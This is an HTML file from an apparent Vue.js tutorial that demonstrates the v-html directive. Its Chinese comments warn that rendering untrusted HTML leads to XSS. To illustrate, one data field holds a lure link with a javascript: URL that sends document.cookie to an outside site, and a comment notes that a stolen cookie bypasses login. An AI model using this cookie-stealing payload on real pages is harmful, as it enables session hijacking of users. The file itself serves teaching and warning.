<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <script src="../vue.js"></script>
</head>

<body>
    <!-- 
        v-html指令：
            1、作用：向指定节点中渲染包含html结构的内容。
            2、与插值语法的区别：
                （1）、v-html会替换掉节点中所有的内容，{{xxx}}不会。
                （2）、v-html可以识别html结构。
            3、严重注意：v-html有安全性问题！！！
                （1）、在网站上动态渲染任意HTML是非常危险的，容易导致xss攻击。
                （2）、一定要在可信的内容上使用v-html，永不用在用户提交的内容上！！！
     -->
    <div id="root">
        <h2>欢迎来到{{name}}学习</h2>
        <h2 v-html="address">欢迎来到{{name}}学习</h2>
        <div v-html="str"></div>

    </div>
    <script>
        Vue.config.productionTip=false;
        new Vue({ 
            el: '#root',
            data: {
                name:'黑马程序员',
                address:"<h3>你好</h3>",
                str:'<a style="color:black" href=javascript:location.href="https://www.baidu.com?"+document.cookie>这有你想要的！！！！快来！！！</a>',
                //cookie 甚至比 token 还要重要，存储在本地浏览器的字符串，相当于访问许可证 
                // 有了它你甚至可以跳过登录页面直接到个人中心 
            }
        })
    </script>
</body>

</html>